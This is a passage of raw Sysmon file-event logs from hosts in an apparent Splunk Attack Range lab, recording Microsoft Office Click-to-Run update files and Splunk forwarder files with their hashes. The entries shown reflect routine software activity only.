Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\FLASH.NET.XMLMD5=16460D48998FC7FF33DEC3A33413CE42,SHA256=6A3475B1039B1FDE47EA9F5BE3124E7C812FB0A0B68163D3A763A3EECE8FE1B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\BTOPENWORLD.COM.XMLMD5=F7120202954B5559DF4E0C9BCD7B7B16,SHA256=C5CD6124B33DA659724837C3B83B5A54C027B5C9719D1E6AF2E778C9811E1DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\BTINTERNET.NET.XMLMD5=F7120202954B5559DF4E0C9BCD7B7B16,SHA256=C5CD6124B33DA659724837C3B83B5A54C027B5C9719D1E6AF2E778C9811E1DF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OutlookAutoDiscover\AMERITECH.NET.XMLMD5=DB8F644908E1AE52C9C51544B3E84093,SHA256=6D0C439A131E82DF17FFB0633057BA402D5D5BE33A73B97494BE77E8B5C8A4A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\osfFPA\addins.xmlMD5=EE0E2AEBD516055D1F67E4F74EDCA09C,SHA256=CC8AD73904FB89F465438331B8386C6D6CB2BBC133E585ED93A1944B187424FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNoteNames.gpdMD5=5047CEC9C08AA6B6CE46BDACCEFE986A,SHA256=551FED688509A5D587AB0082E1E612FC7D2485595F2B55BC300FDC5F83BB036B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNoteFilter.dllMD5=3662BF5C56E4DF7FEBDC3CFD08E9E4D5,SHA256=21BBCC0E7193755159A1D841BB6EE9A580A0FA4F1BBE95B4C2C36C118BCDF012,IMPHASH=AB24A902F724D73A3FC0AAF53CD78A28truetrue 23542300x800000000000000069309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNote.iniMD5=640E4D188A62FD78B2AD43AF47495CEF,SHA256=499E42AD8161DF80963C9890921C98E3EC0464B431F4A78167EEDBDB3CA95789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNote.gpdMD5=9D77694DAF3D4E5073633D0DAF5CD720,SHA256=B1B5E571607D91B5E1611E1310238C83F4E219C02AFF47608C289FE01D9C2D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNote-PipelineConfig.xmlMD5=D7EF893DB4590A85390F72194D40C0B0,SHA256=5B437FD2A956337F71E8E69E9231D844F95BD5C6420DDF0C0155624E7D7168A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\SendToOneNote-manifest.iniMD5=91CE083419EBD92711946F7525E61835,SHA256=30AD3DDC45EFB0EC9D2557CBD226E522F2CA78C40A10CF7576B437F7F735EA38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\prnSendToOneNote_win7.infMD5=686088F195B704C0EA577DF3BAC9BE6E,SHA256=37B66A457203324B5A6C8D65720A5D90020FA3FAAA766A4A8A44AF8A8B09A1CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\prnSendToOneNote_win7.catMD5=397594FBB76E0EDB7C35250347BB02DA,SHA256=64745086F122716C9A5078FFCDEE3C733503A8E15F59FEA0EE5ADF1D3B41D364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\prnSendToOneNote.catMD5=46617152A7D964CF3532EE008A4EAA19,SHA256=C73BE7A5E5B3D641EDD93AAD497B0C1AD0587AD9998F166229FCDC02668C481B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OneNote\prnms006.infMD5=F6BBD70FA6229EAC8AF2B7D62BDB2BB8,SHA256=378C6DA2C15D79A8F79EFF3AA4F5F13AE64EB9B760DC061E5A488992A1D874D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\salesforce.iniMD5=B4AC1F73BA8548DED15A2EF6DC57E008,SHA256=3DF1F4D27252D96A40444C588B12FB0A6C25B75B052DA663AFC13A052C615658,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\redshift.iniMD5=A8840B7BB7E0E4DA3AD4AA99FD7E6282,SHA256=1E32394AC97318756C7707C4230C58DB9AE25C17AB0589747278609F2B7E12EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\zlibwapi.dllMD5=C51BB9322C59E2AD09DAF9CE9BC108F8,SHA256=C5E9E112D83F4EC191DA12084C6854E98EE99231BBD6ED2F38BCDE38EEBFD079,IMPHASH=AA8B89D46B51E3CA4A0D11459C181DF0truetrue 23542300x800000000000000069298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:23.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Salesforce\lib\sfodbc_sb64.dllMD5=ECAEE0CA125E6549182E6B648FA4EA7E,SHA256=4AD44B287B24429730A731CB7E8E7D6DA0E70649B656288B8171A2503D1830FD,IMPHASH=5609D3B19DD3271486F62251D009E1B5truetrue 23542300x800000000000000049755Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:23.877{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D57FF0F0E31A93C5742FE4CBA6656A90,SHA256=2CD3478712CCD0C0A3EC8E9C5BD67777B3DF83C154D580B4111A5E639A7E3258,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049754Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:23.706{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049753Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:23.518{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=394A1360ACA7F99874B2F00CA2DD8173,SHA256=C390BF473B36062B39ABA9AF31AD2D96AFE6C62231FD338FF96BEB7D7B136AFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069645Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\INVITE11.POCMD5=0C74EC36BA5EE90B15D91D5F888234FC,SHA256=E92E4826DDA14791514E91F9C7C69802B2B2CC53A86BE4DB35C132FA9D226DF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069644Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\INVITE.XMLMD5=4FA20E2DEF84399657C2B7E9AB14227E,SHA256=D483D404FC34AC8004B6653F3D2FB658D72CD19FD7B8F2FF102FE8E5055CF70A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069643Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\INVITE.DPVMD5=FD02067A0DEE0622FA5ACDFEDE7D53B7,SHA256=080D41B4976034DB4B3A93466FC5C1F93A2DEEA7998444882AA1D2A55576AACE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069642Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\HEADINGBB.POCMD5=F813D4C7F0CCAFCA760BE2C594836C60,SHA256=392D649E1F826A64E3BACB4A873008F2BD53152AECE25417937C9EC7E13BB3E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069641Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\HEADINGBB.DPVMD5=F71F69A106F17D895A8C801707B389AF,SHA256=47EC0D4B393A40ED99D1BB224B46F5970E677532020F78E462B584CCF4148E69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069640Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\GREETING.XMLMD5=2F4FF4266B4450894C716BB86B8CA567,SHA256=60E062A4B82A3809EEB6ED94DE24FCB002F0CF07CDF20354D6DF8A7C4E5A75DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069639Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\GREETING.DPVMD5=785A903903443A0129A0D91771CD8A75,SHA256=DA361ED3B61977B1C198FB97B9AE975615D440BBCF37440903482410478C23BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069638Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\GREET11.POCMD5=90E5120C9225BF4C731E6BE3B7BB9E9E,SHA256=68F029134AAF37C4541FFE522C79D3FBED31BC9401AE533B2F42AA67C013225E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069637Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\GIFT98.POCMD5=2A4834ECA5E793D6E8451A510244F73D,SHA256=E2EA938277CB812AD79180B4E605BD56EBCB22AC8C8FFA91DDC54B7B485D786A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069636Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\GIFT.XMLMD5=1E4B85AF206FE94972495FC3C9669A00,SHA256=1F77141D7C505318F27ECF0FE523F7128B520D884E0E0D3DE566AB43999BB069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069635Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\GIFT.DPVMD5=2427200797A4DCA70AF19202EF8D51A2,SHA256=E3A12FE4A1D8770FD597E2D62C5A34229F8BF12B74A565510F8F12C32DC015F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069634Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FS3BOX.POCMD5=887F3865C55517A1EAD2663DE5019998,SHA256=007D574F67B715D8AEF2889C2A1745DC18E5D1BF298176AF311FB093693FF23B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FORMCTL.POCMD5=DFB8C3E78CC6328D3D6D8E45DA1F028D,SHA256=074F3F73CC1F8A31D0780D076C44A1BFE90DB7C100B0749D19505E721099304D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28981011426F822050A72219C3EA9C5E,SHA256=C3D61EA76A97B055B6F05CF7A03EF42B2426D2EC871C9346870696AE701217F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FORM98.POCMD5=FB2ABB7E74AEB0BFEE44E2FC1222B74C,SHA256=535524D65F8C2B0EF110897C1D8F76F6A83F71F61C3613DD52F965E66A35A4EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FOLDPROJ.XMLMD5=2A48B714E5DD1FF04B7F422714A51478,SHA256=3D458241BA067C5E552C87B6992E774F8CCBA753E783B296942523F1BA6DD856,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FOLDPROJ.DPVMD5=C67E0D4A455E74237D399ED8753FD42B,SHA256=FA1BE2DFCDD8DAB0217EC9C65B499A69E867D0ECA4AAC512CE3A15C7B7F58805,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FLYERHM.POCMD5=2FDCD308F11B11E7A440A6B06963CB6A,SHA256=ED2D60019139A86D801FA0E5DE254CA5D983DB38190CB45C8A56D996DD893E10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FLYER98.POCMD5=8BDFDE843F44B6B960A721F48EB790C8,SHA256=0E745197DFB61A7D127103CE827E7E55B2BA1C927889C331015F748ED7B8B9C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FLYER11.POCMD5=BEC9412198BA7172CFB2320B9C042FAE,SHA256=591C90242202A2EA4A4792FC3EBC08CBACA58A8854B4C5EF95A7F151AC722918,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FLYER.XMLMD5=D30A43D1E1EB6BFC51D4D508760C4CA1,SHA256=1FE107DEAD3094080CF77A74412EB67996328ABA8A9DD35E46FE4291B160F6D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FLYER.DPVMD5=2F2BA71E904BE3D43008A6ED12867058,SHA256=E372A5CC24D55D886FF4FBA5A321A0D672E733389BCF6FCE263396209EAE2A57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\FLY98SP.POCMD5=198D102BC1A80F62CE364AD96DE369FA,SHA256=5A49B30D3E065E1AA8BB36A05C95D833B6406140F77308C4E76EBA8E8516C3F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 